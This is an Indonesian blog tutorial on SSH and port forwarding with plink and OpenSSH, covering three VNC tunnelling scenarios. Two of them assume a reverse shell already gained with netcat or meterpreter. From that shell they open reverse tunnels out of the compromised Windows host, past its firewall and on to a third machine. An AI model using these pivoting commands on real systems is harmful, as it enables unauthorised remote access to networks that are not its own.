Beranda Info Pengertian : Secure Shell (SSH)

Pengertian : Secure Shell (SSH)

316
0
BERBAGI
Secure Shell (SSH)
Pengertian Secure Shell
Secure Shell (SSH)
Secure Shell (SSH)

Apa itu SSH?

SSH adalah singkatan dari “Secure Shell“, itu digunakan untuk membuat koneksi yang aman antara dua komputer.

SSH menyediakan antarmuka baris perintah untuk remote administrasi / manajemen sistem berbasis Linux atau bahkan CISCO router, Hal ini memungkinkan kita untuk aman melakukan berbagai tugas pemeliharaan dan lebih … pada dasarnya kita bisa menganggapnya sebagai “telnet aman”. komunikasi SSH terdiri dari Server SSH dan SSH Client.

 

SSH Remote Tunneling
SSH Remote Tunneling

Jadi apa SSH Tunneling adalah?

Kita dapat menggunakan SSH untuk membuat saluran komunikasi terenkripsi untuk tunnel terenkripsi melalui lalu lintas (misalnya POP3). SSH juga mendukung port forwarding yang memungkinkan ssh untuk dilewatkan lalu lintas masuk ke host tertentu dan port. Dalam tutorial ini kita akan melihat pada berbagai skenario dan penggunaan untuk SSH.

 

Skenario 1:

Host A – SSH Client (Plink berjalan pada Windows XP)
Host B – SSH Sevrer (OpenSSH berjalan pada linux)
Host C – Destination (VNC Server diinstal pada sistem Windows XP)

Dalam skenario host ini A memiliki akses ke Host B melalui SSH yang membutuhkan username dan password yang valid untuk sambungan tersebut.

Host A berada di belakang firewall yang blok koneksi vnc keluar pada port 5900 dan ingin terhubung melalui VNC ke Host C.

Mari kita tunnel keluar sesi vnc kami melalui ssh dengan memulai perintah berikut di Host A:

C:\>plink.exe [Host B] -P 22 -C -L 127.0.0.1:53:[Host C]:5900 -l username -pw password

Kami terhubung ke server ssh kami melalui port 22 dan sebuah tunnel yang telah kami buat.

Menggunakan perintah netstat Anda akan melihat antarmuka loopback Anda (127.0.0.1) sekarang listening pada port 53 (yang merupakan awal dari tunnel).

C:\>netstat -an | FIND “53”
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING

Ketika kita membuka klien vnc kami dan terhubung ke 127.0.0.1:53 data yang akan dikirim melalui tunnel dan akan diteruskan ke port 5900 (yang merupakan ujung tunnel kami).

Jika Anda menggunakan linux SSH bukan Plink Anda dapat menggunakan perintah berikut:

exploit ~ # ssh -L 53:[Host C]:5900 [Host B]

 

Skenario 2:

Host A – SSH Server (OpenSSH berjalan di linux)
Host B – SSH Client (Plink berjalan pada Windows XP)

Dalam skenario host ini A ingin terhubung ke Host B menggunakan vnc.

Host B terletak di belakang firewall / router tanpa port vnc terbuka

Hal itu memiliki server vnc diinstal dan mendengarkan secara lokal pada port 5900,untuk skenario ini kita harus sebelumnya memperoleh reverse shell menggunakan netcat atau meterpreter.

Kami akan memulai perintah berikut dari shell kami di Host B :

C:\>plink -P 22 -l username -pw password -C -R 5900:127.0.0.1:5900 [Host A]

Yang harus kita lakukan sekarang adalah membuka klien vnc kami di Host A dan terhubung ke: 127.0.0.1: 5900

Skenario 3:

Host A – SSH Server (OpenSSH dengan remote port forwarding diaktifkan berjalan di linux)
Host B – SSH Client (Plink berjalan pada Windows XP)
Host C – Destination (VNC Server diinstal pada sistem Windows XP)

Skenario ini mirip dengan skenario 2 terkecuali dari host ketiga yang terlibat.

Sekali lagi, kita telah mendapatkan reverse shell di Host B dan kami akan menggunakan Host B untuk tunnel dan lalu lintas ke depan ke Host C vnc server menggunakan perintah berikut:

C:\>plink.exe [Host A] -P 22 -C -R 127.0.0.1:53:[Host C]:5900 -l username -pw password

Sekali lagi membuka klien vnc Anda dan membuat sambungan ke: 127.0.0.1:53

LEAVE A REPLY

Please enter your comment!
Please enter your name here